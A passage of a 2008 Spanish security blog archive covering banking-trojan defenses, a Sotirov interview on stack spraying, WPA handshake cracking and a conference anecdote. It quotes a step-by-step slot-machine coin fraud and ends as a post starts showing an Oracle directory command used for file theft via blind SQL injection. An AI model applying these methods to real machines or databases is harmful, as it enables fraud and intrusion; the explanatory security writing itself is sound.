En definitiva, el fallo es grave, es necesario actualizar ya. Sin excusas. No se han reportado problemas de estabilidad con el parche. Pensamos que sería muy raro que se produjese una epidemia como la de 2003. Aunque los índices de infección de malware son hoy mayores que nunca, al menos no son gracias a este tipo de errores tan "sencillos" de explotar.

Sergio "pajarraco" de los Santos

domingo, octubre 26, 2008

Un asunto pendiente

Hoy domingo, con un poco de resaquilla, que ayer me pasé con el vino y los cubatas, estoy quitándome asuntos pendientes al mismo tiempo que lo alterno con lectura de comics y repaso a videos graciosos.

Uno de los asuntos pendientes era ver la carrera de Alonso en el gran premio de Singapore que no pude ver. Se realizó el día 28 de Septiembre y a mi me pilló en San Diego en la ToorCon, a horario cambiado, en un hotel en el que ninguna de las cadenas de televisión que tenía emitía la carrera y preparando mi charla.

Me he ido a ver el resumen de la F1 de Singapore y al oir la música y ver el montaje... me he puesto más contento que una pera limonera... Si te gustan los coches y la música.... ponte ese vídeo a alta calidad.... Recuerda: Singapore.

Saludos Malignos!

Medidas de protección contra troyanos bancarios (VI de VI)

***************************************************************************************
Artículo publicado en PCWorld Profesional Septiembre 2008
Medidas de protección contra troyanos bancarios (I de VI)
Medidas de protección contra troyanos bancarios (II de VI)
Medidas de protección contra troyanos bancarios (III de VI)
Medidas de protección contra troyanos bancarios (IV de VI)
Medidas de protección contra troyanos bancarios (V de VI)
Medidas de protección contra troyanos bancarios (VI de VI)
***************************************************************************************

Zonas de Seguridad

El uso de las zonas de Seguridad en tu equipo permite que puedas permitir algunas opciones, como los comandos javascript, los objetos Applet, o los controles Activex sólo en sitios de confianza y no para todos los sitios que se visitan en Internet. Son muchas las veces en las que mediante el uso de técnicas de engaño con javascript, usando sistemas de publicidad atacados, lanzando exploits a través de lenguajes script o simplemente usando servidores comprometidos se infecta a los visitantes de una web.

Otra opción interesante que permite Internet Explorer es el aislamiento total de la navegación entre zonas no permitiendo que compartan navegador en las mismas pestañas. Esto permite un mayor aislamiento de las opciones de seguridad.


Imagen: Aislamiento de zonas de seguridad

Sitios Fraudulentos de Phishing

Muchos de los troyanos bancarios, aunque no los más modernos y avanzados, siguen utilizando sitios fraudulentos en servidores web para simular sitios bancarios. Para evitar que estos sitios engañen a los usuarios, cuando un nuevo servidor es contrastado como un sitio que realiza robo de datos bancarios las empresas de seguridad lo meten en bases de datos de sitios ilegítimos. Estas bases de datos son consultadas por los navegadores con filtros antiphishing para mostrar una alerta de seguridad severa cuando alguien accede a uno de estos sitios.

Además del filtro basado en consulta de bases de datos, Internet Explorer 7 realiza un análisis heurístico de la página mostrada al usuario por si contiene información superpuesta, textos escondidos o cualquier estructura utilizada comúnmente en ataques de fraude bancario con lo que saldrá un aviso de seguridad en el caso de que exista algo “extraño”.

Por último si cualquier usuario detecta un sito fraudulento, por ejemplo, una web que representa a una entidad bancaria y que está en un dominio no perteneciente a esa entidad, se puede reportar como sitio de phishing. No es peligroso, pues antes de marcar ese sitio como de phishing los equipos de seguridad realizan una verificación para saber si es o no un sitio de fraude. Si se comprueba que es un sitio ilegítimo pasará a formar parte de la base de datos y se procederá a intentar quitarlo.


Imagen: Notificación de Sitio de Phishing. Paso 1.


Imagen: Notificación de sitio de Phishing. Paso 2.

Recomendaciones Finales

Si el ordenador es compartido por varios miembros de la familia, que todos estén educados en las medidas de seguridad y que todos tengan mucho cuidado con lo que se ejecuta en cada máquina. Si tienes un ordenador nuevo con Vista, no le instales un Windows XP, las mafias conocen bien Windows XP y Windows Vista trae muchos controles de seguridad extras que les dificultan “su trabajo”. Ellos estarán contentos si usas versiones antiguas de los navegadores de Internet, versiones antiguas de sistemas operativos o de cualquier software, así que actualiza.

Además, como recomendación añadida, procura fortificar tus buzones de correo. No sigas links desde el correo, activa las comprobaciones antispam que te filtren el máximo de correos maliciosos y ten el antivirus enchufado también al correo. El spam es uno de los motores en la distribución de troyanos bancarios, ya sea directamente, mediante referencias a webs que te van a intentar infectar, etc...

Estate siempre alerta, en cualquier rincón de una web, en cualquier esquinita de un archivo, en cualquier trozito de link o en cualquier arvhivito adjunto puede venir "el premio".

Por lo tanto, como dijo un día un amigo mío: “Se rápido con la mente y lento con el doble clic”.

Saludos Malignos!

***************************************************************************************
Artículo publicado en PCWorld Profesional Septiembre 2008
Medidas de protección contra troyanos bancarios (I de VI)
Medidas de protección contra troyanos bancarios (II de VI)
Medidas de protección contra troyanos bancarios (III de VI)
Medidas de protección contra troyanos bancarios (IV de VI)
Medidas de protección contra troyanos bancarios (V de VI)
Medidas de protección contra troyanos bancarios (VI de VI)
***************************************************************************************

viernes, octubre 24, 2008

Para estudiar la semana que viene

Ahí quedan algunas recomendaciones para la semana que viene, para que no te aburras ;),..y... esto... antes... no te olvides de parchear el Windows, ¿eh?, que esta tiene "su gracia".

Lunes, 27 de Octubre

[Madrid] Asegúr@IT IV
[Madrid] HOL Windows Vista. Instalación
[Madrid] HOL Internet Information Services 7.0

Martes, 28 de Octubre

[A Coruña] Technology Tour
[A Coruña] Innovation Day
[Alcalá de Henares] University Tour
[Madrid] HOL Windows Vista. Administración

Miécoles, 29 de Octubre

[A Coruña] Jornadas de Seguridad
[Madrid] HOL Windows Vista. Seguridad
[Madrid] HOL Windows Server 2008. Hyper-V
[Madrid] University Tour en la Universidad Complutense

Jueves, 30 de Octubre

[A Coruña] Jornadas de Seguridad
[Madrid] Technology Tour
[Madrid] Innovation Day
[Pamplona] Firma Digital
[Madrid] HOL Windows Vista. Net Services

Viernes, 31 de Octubre

[Madrid] HOL Windows Vista. Business Desktop Deployment
[WebCast] Migración de Notes a Exchange y Sharepoint
[Pamplona] Facturación Electrónica

Saludos Malignos!

Escapada en Málaga

Sé que todos vosotros, panda de crápulas y seres sin alma ni conocimiento, estáis esperando con los colmillos afilados que cuente y eche pestes sobre las aventuras y desventuras que me han sucedido en mi viaje a Málaga para participar en la Conferencia Internacional del Software Libre como ponente.

Sí, a diferencia de otras veces, esta vez iba como ponente y no como puesto (interprétalo como quieras o puedas) a una charla en la que me esperaban con los brazos abiertos, como agua de Mayo.

Y allí llegué yo, a un precioso recinto en Málaga que es una pocholada. En la parte de registro uno de los voluntarios me atendió y me acompañó hasta la escalera de subida a la zona de registro para los ponentes. Un diez, no, un once para los voluntarios que ayudaban a la gente a resolver sus necesidades.

De pronto, una horda de enemigos se encontró delante de mí. Me estaban esperando en la primera planta, con hachas, arcos de energía y cerbatanas con dardos adormiladores. Yo salté hacia un lado, al viejo estilo de Han Sólo luchando contra los imperiales, como aprendí en mí última aventura en Namibia, y me cubrí con mi Windows Vista acorazado.

Rodando, llegué a un escape de ventilación por el que me pude arrastrar dos plantas con una bolsa de portátil de la OSWC que robé justo cuando entraba en el túnel de ventilación. En mitad de la escapada recibí una alerta en mi HTC. Me llamaba Enrique Rando que había venido a mi rescate. Enrique me dijo: “Rápido, dentro de la mochila que has robado, además de una taza de café impregnada en sustancias psicotrópicas para lavarte el cerebro tienes dos camisetas de la OSWC. Ponte una y suéltate el pelo para pasar desapercibido”.

Así hice y salí a la explanada confiado en no ser descubierto de forma sencilla, pero de repente una voz a mi espalda me llamó:

“cuñaorrr!!! ¿pero que hases tú aquír? ¡Qué te van a matar!”

Pajarraco de los Santos, con su ay!fon y su camiseta de Los Soprano me había detectado. Mierda, si lo había podido hacer él, lo podrían hacer otros. “Joder, ¿cómo sabías que era yo?”. “Capullo!!, te has puesto la camiseta eza que te tiene que dar hazta urticaria pero siguez con la mochililla de la Blackja´ con el logo de Microso´! Se te reconocería a una legua!”

“Mierda!, me han detectado con técnicas de fingerprinting, tengo que mejorar el disfraz”

Así que Enrique, Pajarraco y yo nos fuimos al stand de la Junta de Andalucía a refugiarnos a la sombra de un gigantesco pingüino verde al que llamaremos Pingüilla, el monstruo. Allí, al amparo de los escudos de energía de la junta pudimos sacar al “elegido”. El Windows Vista, con su tarjeta 3G de movistar.

Llamábamos un poco la atención y nos miraban las hordas de gamorranos desde las afueras del escudo de energía, pero estábamos protegidos mientras preparábamos la charla. Mientras tanto, grupos de aburridos se acercaban al monstruo Pingüilla para engañar a la historia cambiando su aspecto en una foto. Esto lo habréis visto muchas veces, un grupo de gente que se aburre como una ostra de repente se tira una foto en la que parece que están en el Club Playboy de Las Vegas restregando cebo… bueno, me habéis entendido.

De pronto nos dimos cuenta de que el tiempo se nos echaba encima y debíamos ir hacia la sala de la ponencia, así que montamos una estrategia. Pajarraco y su padawan, Enrique Rando y su partner irían por delante cubriendo nuestro avance y yo iría en la retaguardia con la camiseta, el pelo suelto, la mochila sospechosa oculta y simulando beber de la taza lavadora de cerebros, esperando de esta forma no ser descubierto cuando de repente….

Alguien se me queda mirando y me dice, “Chema, ¿qué haces tú aquí?”. Joder, un colega. “baja la voz, que me descubren, nos vemos en la Alpha7 a las 15:00, ¿ok?."

Él me asintió y nos despedimos con el saludo típico de los vendidos a Spectra. “Qué clippy esté contigo”. Este es un viejo ritual de los tiempos de la vieja república que utilizábamos para reconocernos.

Por fin, llenos de jolgorio y alboroto, llegamos al lugar de la charla, un sitio lleno de fiesta, alegría, diversión, genial, dónde, nosotros perpetramos nuestra acción reivindicativa. Así, hicimos un ataque de ingeniería inversa y en lugar de dejar que la gente en las fotos viera que todo era muy divertido en nuestra sesión, decidimos guardar para la historia una foto en la que se nos viera serios y aburridos. De esta forma, cambiaríamos la memoria histórica….
¡

Enrique Rando & me en la OSWC 2008

La charla que dimos la tenéis en la siguiente PP...digo ODP que he subido a Slideshare.

Antes de que terminara la sesión me mandaron un cuerpo de escolta de rescate desde Sevilla. Un escuadron afincado en Sevilla, partner de Spectra, vino a recogerme en una operación coordinada de rescate que venía con transporte incluido. Así, nada más terminar la sesión, es decir, a las 14:00 horas del día D, aprovechando el alboroto me metieron con la cabeza agachada debajo de una cazadora y me llevaron corriendo por pasillos secundarios hasta el transporte.

Levante la cabeza, vi el sol bajo el cielo de Málaga y respiré profundamente aliviado. Había sido una incursión dificil, pero ya estaba a salvo... o eso pensaba. De repente un horda de gamorranos armados salía del pabellón gritando y corriendo viniendo hacia a nosotros.

Rápido, rápido, al transporte.....

Saludos Malignos!

jueves, octubre 23, 2008

Entrevista a Alex Sotirov

En mi viaje relámpago a la ToorCon X en San Diego, y tras un “más que interesante” viaje, tuve la suerte de sentarme y poder disfrutar de las conferencias del primer día. Entre ellas, la de Alex Sotirov y su ya famosa charla sobre “Cómo impresionar chicas saltándose las protecciones de memoria en la navegación con Windows Vista”. La presentación estaba llena de información técnica, difuminada de perlas de humor flemáticas de un tipo, Alex, que con sonrisa de medio lado y voz tranquila y pausada, remarcaba con un simple levantamiento de ceja y movimiento de cabeza. Un crack del balón.

Al final de la charla, ya en el pasillo, le asalté cual fan de Tokio Hotel y le propuse hacerle la entrevista, que tenía muchas cositas que preguntarle después del revuelo que tuvo aquí en España:

“Algunas serán preguntas técnicas…otras no”

Movimiento de cabeza. Levantamiento de ceja. Sonrisa de medio lado. Y aquí está la entrevista.


Alex Sotirov en ToorCon X

1.- Seriously, is it possible to impress girls bypassing memory protections or it's completely impossible because it means we are nerds?

It is not very easy, but it is definitely possible :-) If it doesn't work, keep trying!

1.- En serio, ¿es posible impresionar chicas saltándose las protecciones de memoria o es completamente imposible porque eso significa que somos nerds?

No es muy fácil, pero es definitivamente posible. :-) Si no funciona ¡sigue intentándolo!

2.-Tell us in few words in which consists the stack spraying technique.

The stack spraying technique is very similar to heap spraying. It allows the attacker to fill a large amount of address space with data they control. This data can include return addresses or object pointers that can be used in the exploitation of memory corruption vulnerabilities. The difference between stack spraying and heap spraying is that instead of allocating data on the heap, the program creates a large stack and calls a recursive Java or .NET function to fill the stack with many copies of a stack frame. This stack frame controls the stack spraying data.

2.- Cuéntanos en pocas palabras en qué consiste la técnica stack spraying

La técnica stack spraying es muy similar a la de heap spraying. Permite al atacante llenar una gran cantidad del espacio de direcciones con datos que el controla. Estos datos pueden incluir direcciones de retorno o punteros a objetos que pueden ser utilizados en la explotación de vulnerabilidades de corrupción de memoria. La diferencia entre stack spraying y heap spraying es que en lugar de colocar datos en el heap, el programa crea una gran pila y llama a una función Java o .NET recursiva para llenar la memoria con muchas copias de una misma estructura de pila. Esta estructura controla el la difusión de los datos en la pila.

3.- and.. What operating system is running in your box?

My laptop is running Vista x64 on an Apple MacBook Pro. All my browsers run in virtual machines using VMware Workstation. I also have a couple of OSX and Linux boxes.

3.- Y… ¿Qué sistema operativo está corriendo en tu ordenador?

Mi portátil está corriendo con Vista x64 en un Apple MacBook Pro. Todos los navegadores corren en máquinas virtuales utilizando VMWare Workstation. También tengo un par de ordenadores con OS X y Linux.

4.- Have you ever tasted a "paella"?

No, I haven't. I'll try it next time.

4.- ¿Has probado alguna vez una paella?

No, lo intentaré la próxima vez.

5.- Which one is your favorite video game?

Moonbase Commander. It's a really obscure PC game from 2002 which combines real time strategy with elements of chess.

5.- ¿Cuál es tu video juego preferido?

Moonbase Commander. Es un juego de PC realmente oscuro del año 2002 que combina estrategia en tiempo real con elementos del ajedrez.

6.-How did the Argentinean people treat to you?

I had a great time in Argentina, thanks to all the friendly people I met there. Everybody was very welcoming and I felt at home, even though I didn't speak much Spanish. I am sure that I'll be coming back!

6.- ¿Cómo te trató la gente de Argentina?

Lo pase genial en Argentina, gracias a toda la amigable gente que encontré allí. Todo el mundo fue muy hospitalario y me sentí como en casa, incluso a pesar de que yo no hablé mucho español. ¡Estoy seguro de que voy a regresar!

7.- Is Windows Vista an unsecure operating system?

Vista is the most secure version of Windows that Microsoft has released. The code quality and the number and severity of the bugs have definitely improved. I'm running Vista x64 on my box and I feel that it's pretty secure.

7.- ¿Es Windows Vista un sistema operativo inseguro?

Vista es la versión más segura de Windows que Microsoft ha lanzado. La calidad del código y el número y la criticidad de los bugs se ha, definitivamente, mejorado. Yo corro Vista x64 en mi ordenador y siento que es bastante seguro.

8.- Have you talked with Michael Howard about your work or it wasn´t needed?

Mark and I exchanged some emails with the Microsoft SWI (Secure Windows Initiative) team. They reviewed our paper before we published it and sent us a few corrections and extra information. Overall, we had a really good experience working with them.

8.- ¿Has hablado con Michael Howard sobre vuestro trabajo o no fue necesario?

Mark y yo intercambiamos algunos correos con el equipo de Microsoft SWI (Iniciativa de Windows Seguro). Ellos revisaron nuestro artículo antes de que nosotros lo publicáramos y nos enviaros algunas correcciones e información extra. Sobre todo ha sido una realmente buena experiencia el trabajar con ellos.

9.-Do you have any travel to Spain in forecast?

I will try to come to the SOURCE Barcelona conference in the Fall of 2009.

9.- ¿Tienes previsto algún viaje a España?

Intentaré ir a la conferencia SOURCE que tendrá lugar en Barcelona en el otoño del 2009.

10.- What do you think about people who says that your (You and Mark) work means the end of Windows Vista?

I think that they are entirely wrong. It is true that we showed that the memory protections in Vista are not very good, but XP doesn't even have those protections. Despite our research, Vista is still more secure than XP.

10.- ¿Qué piensas de la gente que dice que vuestro trabajo significa el fin de Windows Vista?

Creo que están completamente equivocados. Es cierto que nosotros mostramos que las protecciones de memoria en Vista no son muy buenas, pero XP ni tan siquiera tiene esas protecciones. A pesar de nuestra investigación, Vista es aun más seguro que Windows XP.

11.- What is the most savage party you ever been?

If I remembered it, it would be savage enough :-)

11.- ¿Cuál es la fiesta más salvaje dónde has estado?

Si la recordara no sería lo suficientemente salvaje :-)

12.- Who has impressed you in computer security?

I'm very impressed with people who have worked in many different areas of security and consistently come up with interesting new ideas. Michal Zalewski is the perfect example for this. I will never be as good as him, but I admire his work.

12.- ¿Quién te ha impresionado en seguridad informática?

Estoy muy impresionado con gente que ha trabajado en muchas diferentes áreas de seguridad y constantemente aparece con nuevas e interesantes ideas. Michal Zalewski es el ejemplo perfecto de esto. Yo nunca seré tan bueno como él, pero admiro su trabajo.

13.- do you need to bypass memory protections to impress girls?

No, sometimes alcohol works just as well.

13.- ¿Necesitas tú saltarte las protecciones de memoria para impresionar a las chicas?

No, algunas veces el alcohol funciona igual de bien.

14.-Your favorite movie is…

My favorite movie is the awesome Clint Eastwood western "The Bridges of Madison County"

14.-Tu película favorite es…

Mi película favorita es el increíble westerm de Clint Eastwood llamado “Los Puentes de Madison”

15.- Kevin Smith or Stanley Kubrick?

Stanley Kubrick

16.- Say the name of three "famous" Spanish people (Pedro Almodovar, Antonio Banderas and Penelope Cruz are not allowed)

Francisco Pizarro, Paco De Lucia, Pablo Picasso

16.- Di el nombre de tres personas famosas españolas (no vale decir Pedro Almodovar, Antonio Banderas o Penelope Cruz)

Francisco Pizarro, Paco De Lucia, Pablo Picasso

17.-You'd forget about computers if.

I would forget about computers if we lived in a post-apocalyptic Mad Max-style world. Until then, I'll keep doing what I do best.

17.- Te olvidarías de los ordenadores si..

Me olvidaría de los ordenadores si viviéramos en un post-apocalíptico mundo estilo Mad Max. Hasta entonces seguiré haciendo lo que mejor hago.

18.- Where are you going to be talking in near future?

I'm going to break the Internet and tell people how I did it.

18.- ¿Dónde vas a estar hablando en un future cercano?

Voy a romper Internet y decirle a la gente como lo hice.

19.- If someone wants to learn about to hacking Vista. What should they read?

If they are a beginner, I highly recommend my friend Jon Erickson's book "Hacking: The Art of Exploitation". It covers basic exploitation on Linux, but most of the information is applicable to all operating systems.

To exploit vulnerabilities on Windows Vista, they need to learn about the memory protection mechanisms in the OS and how to bypass them. As far as I know, there isn't a good book that describes all of that, but there have been a couple of presentations about it at BlackHat and other conferences. My paper about Vista browser exploitation at http://www.phreedom.org/ has some good information and a list of other links people can explore.

19.- Si alguien quiere aprender como hackear Windows Vista. ¿Qué debe leer?

Si son principiantes, yo les recomiendo mucho el libro de mi amigo Jon Erickson “Hacking: The Art of Exploitation”. Este libro cubre los conceptos básicos de explotación en Linux, pero la mayoría de la información es aplicable a todos los sistemas operativos.

Para explotar vulnerabilidades en Windows Vita, necesitan aprender cómo funcionan los mecanismos de protección de memoria en el sistema operativo y como saltárselos. A mi entender, no hay ningún buen libro que los describa todos, pero ha habido un par de presentaciones sobre ello en Blackhat y en otras conferencias. Mi artículo sobre explotación del navegador en Vista en http://www.phreedom.org/ tiene alguna buena información y una lista de enlaces que la gente puede explorar


20.- What blogs do you usually read?

Some of the security blogs I follow are the blogs by David LeBlanc, Dino Dai Zovi, F-Secure, Flylogic Engineering, Freedom to Tinker, Matasano, Matt Blaze, Metasploit, Michael Howard, Nate Lawson, Rober Hensing, and RSnake.

20- ¿Qué blogs sueles leer?

Algunos de los blogs de seguridad que yo sigo son los de David LeBlanc, Dino Dai Zovi, F-Secure, Flylogic Engineering, Freedom to Tinker, Matasano, Matt Blaze, Metasploit, Michael Howard, Nate Lawson, Rober Hensing, y RSnake.

Thanks,
Alex


Saludos Malignos!

miércoles, octubre 22, 2008

La Wifi de mi casa (o de mi hotel)
es particular

***************************************************************************************
Por Alejandro Martín y Chema Alonso
Publicado en ISV Magazine Septiembre 2008
***************************************************************************************
Mucho se ha hablado sobre la seguridad en redes Wireless, pero sin embargo, aunque parezca mentira, aun no ha sido suficiente para hacer entender al usuario menos técnico de los riesgos de una red Wireless insegura.

Supongamos que tenemos un flamante router de conexión a Internet Wifi en nuestra casa con un sistema WEP. En ese entorno, da exactamente igual que contraseña pongas, que sea compleja, sencilla, larga, corta o de colores. Esta contraseña es de una complejidad prácticamente nula para un atacante sacarla, con lo que el atacante podrá, a partir de ese momento por ejemplo: conectarse a tu red y colgar un emule (para que a él no le vaya lenta su conexión a Internet que tiene que trabajar) o hacer trastadas ilegales desde tu dirección IP y ya si eso, si pasa algo malo en el futuro, dios no lo quiera, ya contestas tú sobre las consecuencias o podrá por ejemplo, disfrutar del placer de la lectura de tus conversaciones de Messenger si no has utilizado un programa de cifrado para el mismo, o comparar si realmente puedes permitirte el BMW ese que tienes en la puerta mirando el extracto de tus cuentas bancarias.

Sí, es así de sencillo para un atacante si tienes una red con conexión WEP. Claro, la alternativa es utilizar WPA/WPA2. Ambas tecnologías son bastante similares en su funcionamiento, diferenciándose únicamente en los algoritmos de cifrado y de integridad utilizados. En estos entornos, en redes WPA/WPA2, hay dos formas de configurar nuestra red: El modo “empresarial” y el modo “personal”.

La primera, en modo empresarial, utiliza un servidor RADIUS para autenticar las conexiones, permitiendo que los usuarios o los ordenadores se autentiquen por contraseñas, certificados digitales, etc… Este sistema permite que cada cliente de la red wireless tenga una identificación distinta de sus compañeros de red…y esto es bueno para la seguridad. Sin embargo, esta infraestructura suele requerir más servidores de los que un usuario puede disponer en su casa.


Imagen: Configuración punto de acceso con WPA y servidor RADIUS

En la otra infraestructura, en la WPA/WPA2 personal, todos los usuarios utilizan una misma clave para autenticarse en la red… y esto es malo. Cuando un equipo se autentica en una red el conjunto de intercambio de mensajes es conocido y se realiza a partir de derivadas de la clave. Esto permite a un posible atacante qué, si captura los paquetes de autenticación, conocidos como “handshake” o saludo, pueda intentar saber cuál es la contraseña de la red. La idea es sencilla: El atacante sabe que los paquetes que ha capturado son derivados del nombre de la red y la clave de la red así que, como conoce todo (porque es público) menos la clave de la red, puede ir probando diferentes claves, aplicando el mismo algoritmo que se aplica en las redes WPA/WPA2 y si el resultado es igual a lo que se ha capturado entonces esa es la clave.


Imagen: Crackeo de clave WPA con AirCrack

Estos ataques, realizados por fuerza bruta o por diccionario, se han optimizado mediante el uso de tablas pre-calculadas, es decir, ya existen hasta 33 GB de datos ya calculados con valores de red disponibles en internet. Esto quiere decir que si el nombre de tu red y tu clave son sencillos o han sido ya pre-calculados, para un atacante va a ser tan sencillo como meter tu handshake y en un par de segundos conocer tu clave y a partir de ese momento…. : conectarse a tu red y colgar un emule … y todo lo demás.


Imagen: http://www.renderlab.net/projects/WPA-tables/

En el caso de las redes WPA/WPA2 personales, el uso de un SSID no trivial y de una clave lo suficientemente compleja, aprovechando al máximo los 64 bytes que permite el protocolo, permitirían disponer de cierta seguridad frente a atacantes externos y parece la única solución medio segura para redes particulares… sin embargo…. Sin embargo, tanto en redes WEP como en redes WPA/WPA2, la seguridad de la red queda anulada totalmente contra atacantes internos.

En el caso de WEP, cualquier usuario de la web que tenga la clave WEP puede ver todo el tráfico generado por todos los usuarios en claro, así que, si compartes la red con tu esposa, hermano, hermana, primo, cuñada o suegra, y la tienes en WEP, cualquiera de ellos va a poder ver el tráfico que generas.

En el caso de las redes WPA/WPA2, el cifrado de los datos se hace con claves distintas para cada usuario, es decir, cada uno de los clientes de la red utiliza un conjunto de claves de cifrado (4 para conexiones unicast y 2 para broadcast) que son personales y que además se cambian cada cierto tiempo.

No obstante, un atacante interno en una red WPA/WPA2 que capture el handsake va a poder conocer todas las claves que se han generado para este usuario en particular. La idea es sencilla, el cliente, utilizando la clave de la red WPA intercambia unos numeritos con el punto de acceso. Estos numeritos son utilizados para generar una clave de cifrado temporal que se usará para cifrar las claves que se van a crear para ese cliente y enviárselas. Si un atacante interno conoce la clave WPA/WPA2 va a poder descifrar y acceder a la clave de cifrado temporal y por tanto, a descifrar lo que con ella se cifre. En este caso, las claves de cifrado del usuario. Así, un atacante interno podrá: disfrutar del placer de la lectura de tus conversaciones de Messenger si no has utilizado un programa de cifrado para el mismo, o comparar si realmente puedes permitirte el BMW ese que tienes en la puerta mirando el extracto de tus cuentas bancarias, bla, bla, bla…


Imagen: Datos capturados enviados con WPA capturados y descifrados con ConmmView



Imagen: Página html descifrada a partir del tráfico WPA capturado y descifrado con CommView

Al final, cuando te conectas en un hotel con WEP o WPA/WPA2 personal o cuando le dices a tu primo que viene de visita: “La clave es 283449sufjlkas,.3we09” la seguridad de tu red, ya sea la que sea, se ha terminado así que, aquí tienes unas recomendaciones:

1) WEP es malo, no lo uses nunca. Si vas a un hotel y tiene WEP conéctate sólo a través de conexiones seguras que puedas comprobar mediante certificados digitales comprobables o usa una VPN (para viajar las VPN-SSL son muy cómodas y funcionales).

2) WPA/WPA2 con una contraseña débil es malo, y desde que ha aparecido NVidia Cuda aplicado al crackeo de WPA/WPA2-PSK reduciendo los tiempos un 10.000% las que no sean cambiadas cada poco tiempo también son débiles.

3) Si tienes WPA/WPA2 con un SSID fortificado y una contraseña fortificada de 64 caracteres con un montón de caracteres raros mezclados no le des la clave a nadie, pues todo aquel que tenga la clave podrá ver todos tus datos.

PD: Tal vez eso de montar la VPN sea una buena idea.. ¿no?

Saludos Malignos!

***************************************************************************************
Por Alejandro Martín y Chema Alonso
Publicado en ISV Magazine Septiembre 2008
***************************************************************************************

martes, octubre 21, 2008

Síndrome de abstinencia

Terminaremos el año con el Reto Hacking X, pero mientras que montamos el servidor web, la aplicación, hacemos las pruebas... (muuuuchas pruebas), probamos las herramientas y jodemos la vida al personal,... la gente entra en el síndrome de abstinencia y necesita sus dosis de game para jugar.

Nuestros pandas más sexis necesitan entrenar para llevarse, este año que viene seguro que sí, el CTF en la Defcon (Yo apuesto por ellos!!) así que, nuestro flamante ponente en Asegúr@ IT III, Mikel Gastesi, tiene a varios amigos enfrascaos... Parece que el reto lo ha ganado... sí, "The Doctor" Kachakil, pero también anda enfrascaos RoMaNSoFt, Thor (¡¡ánimo Thor!!), Uri, Dreyercito (XD), Trancek, etc... vamos, los más viciosos ;)

Juega un rato en el Reto 6 si tienes algo de tiempo.

Y, si se te atasca el reto de Mikel Gastesi (que estos de S21Sec que se dedican a reversing a veces se me enredan con Petri y la madre del topo.... :P) puedes jugar a otro conjunto de pruebas en http://blog.geekpuzzle.org/. No conozco mucho la dificultad de las pruebas, pero si alguien se anima que nos haga una crónica.

Saludos Malignos!

Veo todo en Blanco y Negro

Y así ven las máquinas tragaperras que algunos hackers de la barra y el botellín de origen chino han estado despeluchando más que hacienda: En Blanco y negro.

La idea es genial y no deja de ser un autentico ataque, podríamos denominarlo un Blind Black-Coin Injeciton para sacarle la pasta a la tragaperras. El método lo describen con todo lujo de detalles en El Mundo.

“La estafa es tan sencilla como diabólica. Consiste en meter monedas de un euro tintadas de negro, de 20 en 20, que es el tope que permite la máquina. Se juega una vez y en el peor de los casos se pierden 20 céntimos. Luego se pulsa devolución y la máquina devuelve lo que no se ha jugado: 19,80 euros. Y se hace otra vez.

Esta operación lleva a que las monedas negras se coloquen en el depósito sobre las monedas normales, que como están abajo son las que la máquina va devolviendo primero cada vez que se pulsa devolución.

Cuando se ha vaciado el depósito de monedas normales se meten varias monedas, no importa si tintadas o no. Se juega una vez y se pulsa devolver. La máquina se dispone a devolver las monedas no jugadas. Aquí comienza a dar sus frutos la estafa.

El cajetín donde se guarda el dinero sabe qué monedas está devolviendo gracias a una fotocélula que lee cada pieza que sale. Estas fotocélulas, por alguna razón, no ven las monedas tintadas de negro. De modo que cuando se abre la salida del cajetín y comienzan a salir monedas negras la fotocélula no las lee y permite que salgan todas hasta que detecta una sin tintar.

Resultado: el estafador ha sacado todas las monedas normales intercambiándolas por las negras (perdiendo en el peor de los casos 20 céntimos por cada 20 euros) y luego recupera todas las monedas negras de golpe. La Policía estima que con este sistema se pueden ganar 600 euros por máquina tragaperras.”


Estas son las típicas cosas que quitan la razón a las madres que dicen eso de “Nunca llegarás a nada si estás todo el día jugando con el ordenador” y luego acabas como experto probador de juegos, o “deja de jugar con el patinete y ponte a estudiar” que le decía su mama a Tony Hawk o deja de tomar copas y drogas que no vas a llegar a los 34 que le decía su mamá a Jim Morrison.

En este caso la mamá le dijo: “deja de tomar cañas con tapitas de jamón serrano y de jugar a las máquinas y ponte a hacer algo productivo”… o algo así pero en mandarín, y al final el colega se aprendió el funcionamiento de las máquinas tragaperras.

Lo sorprendente es que se mezcla todo lo que debería ser un arte en este país de la picaresca: la caña, la tapa, las máquinas tragaperras, la falta de ganas de trabajar, el ingenio, el pincho y la jeta… ¿y que tenga que venir gente de China a enseñarnos estas virtudes aquí?

Dentro de poco importaremos jamón serrano de Taiwan con 5 jotas y 3 cascabeles de la suerte y nos harán el timo de la estampita dos indios de la India del elefante y el Ganges y les compraremos las Cibeles al Euribor + 0.35 … En fin…

Saludos Malignos!

PD: No te quedes con las ganas, ¡cohones! Disfruta de la canción que esperabas que viniera en este post ;)

lunes, octubre 20, 2008

Publicada Semana Hols en A Coruña

A Coruña va a ser la penúltima ciudad dónde los Hands On Lab van a aterrizar este año (la última será Sevilla si todo sigue su curso) y de nuevo gracias a la colaboración de Caixa Nova la cual lleva años apoyandonos en todo tipo de acciones: Technet Tour, Gira de Seguridad, Hands On Lab y Training days. La campaña de Hands On Lab será el colofón a un gran número de acciones que se van a realizar en A Coruña en los proximos meses:

- 23 de Octubre: University Tour
- 27 de Octubre:
Technology Tour
- 27 de Octubre: Innovation Day
- 28 al 30: Jornadas de Seguridad
- 1 al 5 de Diciembre:
Hands On Lab

- HOL-VIS03 Microsoft Windows Vista. Seguridad
- HOL-WIN31 Microsoft Windows Server 2008. Administración
- HOL-WIN32 Microsoft Windows Server 2008. Active Directory
- HOL-VIS06 MS Windows Vista. Business Desktop Deployment
- HOL-WIN34 Microsoft Windows Server 2008. Powershell
- HOL-WIN36 Microsoft Windows Server 2008. Core Version


Saludos Malignos!

PD: No, no nos olvidamos de Vigo y Santiago y estamos intentando llevar acciones allí

Los activos directorios

No, este post no va del famoso Active Directory creado para gobernar el mundo; tampoco va sobre los directorios LDAP ni por supuesto de la activa carpeta dónde yo guardo toda la manteca de la buena. En este caso va sobre los directorios… en Oracle.

Los directorios en Oracle sirven para cosas muy, muy, muy interesantes, pero para que nos centremos, un directorio en Oracle es la representación virtual dentro de la base de datos de una ruta de almacenamiento física. Algo tan sencillo como:

SQL> CREATE DIRECTORY discoC AS ''c:\''

Claro, como ya habréis podido imaginar esto va a dar mucho juego para interactuar con el sistema de ficheros del servidor dónde la base de datos está funcionando. Para el trabajo de RFD (Remote File Downloading) using Blind SQL Injection Techniques, que presentamos en la ToorCon X nosotros lo hemos utilizado para descargar ficheros del servidor. Para ello utilizamos la posibilidad de crear tablas en Oracle que utilicen como sistema de almacenamiento ficheros. Así, los pasos son sencillos:

1.- Te creas un directorio.

